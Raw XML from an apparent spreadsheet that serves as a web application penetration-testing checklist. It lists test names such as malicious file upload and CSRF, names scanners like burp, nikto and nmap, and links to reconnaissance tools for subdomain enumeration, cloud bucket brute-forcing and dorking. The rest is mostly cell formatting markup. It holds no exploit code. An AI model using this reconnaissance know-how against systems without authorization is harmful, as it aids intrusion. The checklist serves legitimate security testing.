    <t>Test that file contents match the defined file type</t>
  </si>
  <si>
    <t>Test that all file uploads have anti-virus scanning in place</t>
  </si>
  <si>
    <t>Test upload of malicious files</t>
  </si>
  <si>
    <t>Test that unsafe filenames are sanitized</t>
  </si>
  <si>
    <t>Test that uploaded files are not directly accessible within the web root</t>
  </si>
  <si>
    <t>Test that uploaded files are not served on the same hostname/port</t>
  </si>
  <si>
    <t>Check for sensitive data via error message</t>
  </si>
  <si>
    <t>Check for stack traces</t>
  </si>
  <si>
    <t>Other</t>
  </si>
  <si>
    <t>Test for CSRF</t>
  </si>
  <si>
    <t>Test for web server related vulnerabilities</t>
  </si>
  <si>
    <t xml:space="preserve">information gathering </t>
  </si>
  <si>
    <t>whois looup</t>
  </si>
  <si>
    <t>netcraft site</t>
  </si>
  <si>
    <t>robtex DNS lookup</t>
  </si>
  <si>
    <t>appscan</t>
  </si>
  <si>
    <t>accuntix</t>
  </si>
  <si>
    <t>netsparker</t>
  </si>
  <si>
    <t>burp</t>
  </si>
  <si>
    <t>nikto</t>
  </si>
  <si>
    <t>testssl</t>
  </si>
  <si>
    <t>cookies</t>
  </si>
  <si>
    <t>server</t>
  </si>
  <si>
    <t>host</t>
  </si>
  <si>
    <t>javascritp</t>
  </si>
  <si>
    <t>hsts</t>
  </si>
  <si>
    <t>clickjacking</t>
  </si>
  <si>
    <t>option</t>
  </si>
  <si>
    <t>dirb</t>
  </si>
  <si>
    <t>nmap</t>
  </si>
  <si>
    <t>certi</t>
  </si>
  <si>
    <t>neculi</t>
  </si>
  <si>
    <t>https://dorks.faisalahmed.me/?s=08</t>
  </si>
  <si>
    <t>https://www.bugbountyhunting.com/?q=xss</t>
  </si>
  <si>
    <t>Dork</t>
  </si>
  <si>
    <t>writeup</t>
  </si>
  <si>
    <t>CROS</t>
  </si>
  <si>
    <t>nessus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</si>
</sst>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rgb="FF000000"/>
      <name val="Calibri"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color rgb="FF0000FF"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Open Sans"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Open Sans"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Open Sans"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Open Sans"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <name val="Arial"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color theme="10"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <i/>
      <sz val="9"/>
      <color theme="0" tint="-0.499984740745262"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <i/>
      <sz val="10"/>
      <color theme="0" tint="-0.499984740745262"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color theme="10"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <i/>
      <sz val="9"/>
      <color indexed="23"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <i/>
      <sz val="10"/>
      <color indexed="23"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="5" tint="-0.249977111117893"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
  </fonts>
  <fills count="9">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF00B0F0"/>
        <bgColor rgb="FF00B0F0"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="0"/>
        <bgColor theme="0"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFFF00"/>
        <bgColor rgb="FFFFFF00"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="3"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4"/>
      </left>
      <right style="thin">
        <color theme="4"/>
      </right>
      <top style="thin">
        <color theme="4"/>
      </top>
      <bottom style="thin">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4"/>
      </left>
      <right style="thin">
        <color theme="4"/>
      </right>
      <top style="thin">
        <color theme="4"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
  </borders>
  <cellStyleXfs count="2">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="top"/>
      <protection locked="0"/>
    </xf>
  </cellStyleXfs>
  <cellXfs count="66">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="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0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="5" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="2" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="7" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="0" xfId="1" applyFont="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="4" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="2" fontId="0" fillId="0" borderId="5" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="8" borderId="2" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="8" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="8" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="7" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="8" borderId="2" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="21" fillId="6" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="2" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="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left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="1"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horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="3" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="4" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
  </cellXfs>
  <cellStyles count="2">
    <cellStyle name="Hyperlink" xfId="1" builtinId="8"/>
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
  </cellStyles>
  <dxfs count="60">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22:G29" totalsRowShown="0" headerRowDxfId="59">
  <tableColumns count="6">
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0000-000002000000}" name="Test Name" dataDxfId="58"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0000-000003000000}" name="Description" dataDxfId="57"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0000-000004000000}" name="Tools" dataDxfId="56"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0000-000005000000}" name="Status" dataDxfId="55"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0000-000006000000}" name="Remark"/>
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0000-000001000000}" name="POC"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight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61415" displayName="Table61415" ref="B111:G114" totalsRowShown="0" headerRowDxfId="13">
  <tableColumns count="6">
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0900-000002000000}" name="Test Name" dataDxfId="12"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0900-000003000000}" name="Description" dataDxfId="11"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0900-000004000000}" name="Tools" dataDxfId="10"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0900-000005000000}" name="Status" dataDxfId="9"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0900-000006000000}" name="Remark"/>
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0900-000001000000}" name="POC"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight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616" displayName="Table616" ref="B130:G142" totalsRowShown="0" headerRowDxfId="8">
  <tableColumns count="6">
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0A00-000002000000}" name="Test Name" dataDxfId="7"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0A00-000003000000}" name="Description" dataDxfId="6"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0A00-000004000000}" name="Tools" dataDxfId="5"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0A00-000005000000}" name="Status" dataDxfId="4"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0A00-000006000000}" name="Remark"/>
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0A00-000001000000}" name="POC"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight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8" displayName="Table18" ref="B10:F19" totalsRowShown="0" headerRowDxfId="3">
  <tableColumns count="5">
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0B00-000002000000}" name="Test Name" dataDxfId="2"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0B00-000003000000}" name="Description" dataDxfId="1"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0B00-000005000000}" name="Status" dataDxfId="0"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0B00-000006000000}" name="Remark"/>
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0B00-000001000000}" name="POC"/>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32:G36" totalsRowShown="0" headerRowDxfId="54">
  <tableColumns count="6">
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0100-000002000000}" name="Test Name" dataDxfId="53"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0100-000003000000}" name="Description" dataDxfId="52"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0100-000004000000}" name="Tools" dataDxfId="51"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0100-000005000000}" name="Status" dataDxfId="50"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0100-000006000000}" name="Remark"/>
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0100-000001000000}" name="POC"/>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B47:G57" totalsRowShown="0" headerRowDxfId="49">
  <tableColumns count="6">
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0200-000002000000}" name="Test Name" dataDxfId="48"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0200-000003000000}" name="Description" dataDxfId="47"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0200-000004000000}" name="Tools" dataDxfId="46"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0200-000005000000}" name="Status" dataDxfId="45"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0200-000006000000}" name="Remark"/>
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0200-000001000000}" name="POC"/>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B68:G76" totalsRowShown="0" headerRowDxfId="44">
  <tableColumns count="6">
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0300-000002000000}" name="Test Name" dataDxfId="43"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0300-000003000000}" name="Description" dataDxfId="42"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0300-000004000000}" name="Tools" dataDxfId="41"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0300-000005000000}" name="Status" dataDxfId="40"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0300-000006000000}" name="Remark"/>
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0300-000001000000}" name="POC"/>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B61:G65" totalsRowShown="0" headerRowDxfId="39">
  <tableColumns count="6">
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0400-000002000000}" name="Test Name" dataDxfId="38"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0400-000003000000}" name="Description" dataDxfId="37"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0400-000004000000}" name="Tools" dataDxfId="36"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0400-000005000000}" name="Status" dataDxfId="35"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0400-000006000000}" name="Remark"/>
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0400-000001000000}" name="POC"/>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B117:G126" totalsRowShown="0" headerRowDxfId="34">
  <tableColumns count="6">
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0500-000002000000}" name="Test Name" dataDxfId="33"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0500-000003000000}" name="Description" dataDxfId="32"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0500-000004000000}" name="Tools" dataDxfId="31"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0500-000005000000}" name="Status" dataDxfId="30"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0500-000006000000}" name="Remark"/>
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0500-000001000000}" name="POC"/>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9" displayName="Table9" ref="B79:G103" totalsRowShown="0" headerRowDxfId="29">
  <tableColumns count="6">
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0600-000002000000}" name="Test Name" dataDxfId="28"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0600-000003000000}" name="Description" dataDxfId="27"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0600-000004000000}" name="Tools" dataDxfId="26"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0600-000005000000}" name="Status" dataDxfId="25"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0600-000006000000}" name="Remark"/>
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0600-000001000000}" name="POC" dataDxfId="24"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight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29" displayName="Table29" ref="B39:G44" totalsRowShown="0" headerRowDxfId="23">
  <tableColumns count="6">
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0700-000002000000}" name="Test Name" dataDxfId="22"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0700-000003000000}" name="Description" dataDxfId="21"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0700-000004000000}" name="Tools" dataDxfId="20"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0700-000005000000}" name="Status" dataDxfId="19"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0700-000006000000}" name="Remark"/>
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0700-000001000000}" name="POC"/>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614" displayName="Table614" ref="B106:G108" totalsRowShown="0" headerRowDxfId="18">
  <tableColumns count="6">
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0800-000002000000}" name="Test Name" dataDxfId="17"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0800-000003000000}" name="Description" dataDxfId="16"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0800-000004000000}" name="Tools" dataDxfId="15"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0800-000005000000}" name="Status" dataDxfId="14"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0800-000006000000}" name="Remark"/>
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0800-000001000000}" name="POC"/>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infosec-au/altdns" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ghostlulzhacks/s3brute" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sitereview.bluecoat.com/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://domaineye.com/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ghostlulzhacks/CertificateTransparencyLogs" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/EdOverflow/can-i-take-over-xyz" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rapiddns.io/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viewdns.info/reversewhois" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://urlscan.io/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mxtoolbox.com/asn.aspx" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crt.sh/?q=%25.facebook.com" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-tools.com/information-gathering/google-hacking" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/internetwache/CT_subdomains" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/appsecco/spaces-finder" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/incogbyte/jsearch" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://leakix.net/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielmiessler/SecLists" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/blechschmidt/massdns" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/RhinoSecurityLabs/GCPBucketBrute" TargetMode="External"/></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hyperlink" Target="https://www.shodan.io/" TargetMode="Externa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6"/>
  <sheetViews>
    <sheetView topLeftCell="A7" workbookViewId="0">
      <selection activeCell="A111" sqref="A111"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="14.42578125" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="88.28515625" style="2" customWidth="1"/>
    <col min="2" max="16384" width="14.42578125" style="2"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A1" s="1" t="s">
        <v>0</v>
      </c>
    </row>
    <row r="2" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A2" s="3"/>
    </row>
    <row r="3" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A3" s="4" t="s">
        <v>1</v>
      </c>
    </row>
    <row r="4" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A4" s="5" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="5" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A5" s="5" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="6" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A6" s="5" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="7" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A7" s="3" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="8" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A8" s="3" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="9" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A9" s="3" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="10" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A10" s="3" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="11" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A11" s="3" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="12" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A12" s="5" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="13" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A13" s="5"/>
    </row>
    <row r="14" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A14" s="4" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="15" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A15" s="5" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="16" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A16" s="5" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="17" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A17" s="5" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="18" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A18" s="3" t="s">
        <v>15</v>
      </c>
    </row>
    <row r="19" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A19" s="5" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="20" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A20" s="3" t="s">
        <v>17</v>
      </c>
    </row>
